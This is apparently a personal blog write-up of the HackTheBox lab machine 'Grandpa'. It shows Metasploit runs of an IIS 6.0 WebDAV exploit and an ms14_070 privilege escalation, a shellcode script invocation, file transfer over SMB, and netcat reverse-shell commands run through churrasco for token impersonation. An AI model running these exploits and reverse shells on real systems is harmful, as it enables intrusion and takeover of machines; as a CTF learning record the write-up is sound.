HTB: Grandpa

Grandpa

Grandpa was next after Irked; I went in blind.

Ports

HTTP only.

IIS 6.0

Nmap says:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0

A quick google and I decide to yeet metasploit at it:

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.10
lhost => 10.10.14.10
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.10:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.14:1032) at 2021-03-14 05:31:44 -0400

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2132 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Privesc

I run the local exploit suggester and get about 6 different potential options; none of them work. I google for kernel exploits for Server 2003 SP1 (this is what we’ve got), I find some more options and and try them; nada.

What I was doing wrong - and I was doing something wrong - was that I needed to migrate into a different process before I started. So once that was done, no more problems:

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 272   4     smss.exe                                                        
 280   1080  cidaemon.exe                                                    
 320   1080  cidaemon.exe                                                    
 # etc                                    
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1600  396   svchost.exe                                                     
 1704  396   alg.exe                                                         
 1840  612   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1920  396   dllhost.exe                                                     
 2316  612   wmiprvse.exe                                                    
 2752  3180  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3180  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3628  612   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3988  2752  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
 4092  1080  cidaemon.exe                                                    

meterpreter > migrate 3628
[*] Migrating from 2752 to 3628...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.10:1234 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.10:1234 -> 10.10.10.14:1040) at 2021-03-14 06:05:40 -0400

meterpreter > shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

I’m going to do this again tomorrow without Metasploit by following a walkthrough.

Addendum

So I went back to this to try it without MSF. I looked at a couple of write-ups, but they used identical tooling. Foothold was via this python script. The script contains a whole bunch of shellcode, so it’s not really any clear what it does, so nothing really gained in terms of understanding compared to using Metasploit..

Anyway, it’s invoked like so:

python shell.py 10.10.10.14 80 10.10.14.5 1234

And you catch the shell in a listener. Next, people used a ‘token impersonation’ attack for privesc with a binary called churrasco. It’s copied to a directory that we have write access to (which we conveniently have at C:\wmpub), then executed. Copy it along with netcat using smbserver:

┌──(root💀kali)-[/opt/htb/grandpa]
└─# python3 /usr/share/doc/python3-impacket/examples/smbserver.py share .   
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.14,1031)
[*] AUTHENTICATE_MESSAGE (\,GRANPA)
[*] User GRANPA\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (HTB\GRANPA$,GRANPA)
[*] User GRANPA\GRANPA$ authenticated successfully
[*] GRANPA$::HTB:d62c92d82cb9dafc00000000000000000000000000000000:6521e6930e53d3e7c9bb0cbbcb53eb6a8d769dc217d66bbc:aaaaaaaaaaaaaaaa
# etc

Copy the files:

C:\wmpub>icacls C:\wmpub
icacls C:\wmpub
C:\wmpub BUILTIN\Administrators:(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         BUILTIN\Users:(I)(CI)(AD)
         BUILTIN\Users:(I)(CI)(WD)

Successfully processed 1 files; Failed processing 0 files

C:\wmpub>copy \\10.10.14.5\share\nc.exe .
copy \\10.10.14.5\share\nc.exe .
        1 file(s) copied.

C:\wmpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\wmpub

03/16/2021  10:59 AM    <DIR>          .
03/16/2021  10:59 AM    <DIR>          ..
03/16/2021  10:52 AM            59,392 nc.exe
04/12/2017  04:05 PM    <DIR>          wmiislog
               1 File(s)         59,392 bytes
               3 Dir(s)  18,093,953,024 bytes free

C:\wmpub>copy \\10.10.14.5\share\churrasco.exe c.exe
copy \\10.10.14.5\share\churrasco.exe c.exe
        1 file(s) copied.

And execute it; anything called after -d will be executed as system:

C:\wmpub>.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.5 1235"
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.5 1235"
Program too big to fit in memory

Ahhhhh, WTF? This is the same as 0xdf did:

C:\wmpub>.\c.exe -d “C:\wmpub\nc.exe -e cmd.exe 10.10.14.47 443”

But it worked for him, and not for me. Grrrr. Try this then:

C:\wmpub>.\c.exe -d "type C:\Users\Administrator\Desktop\root.txt"

Program too big to fit in memory

Dunno why I bothered really.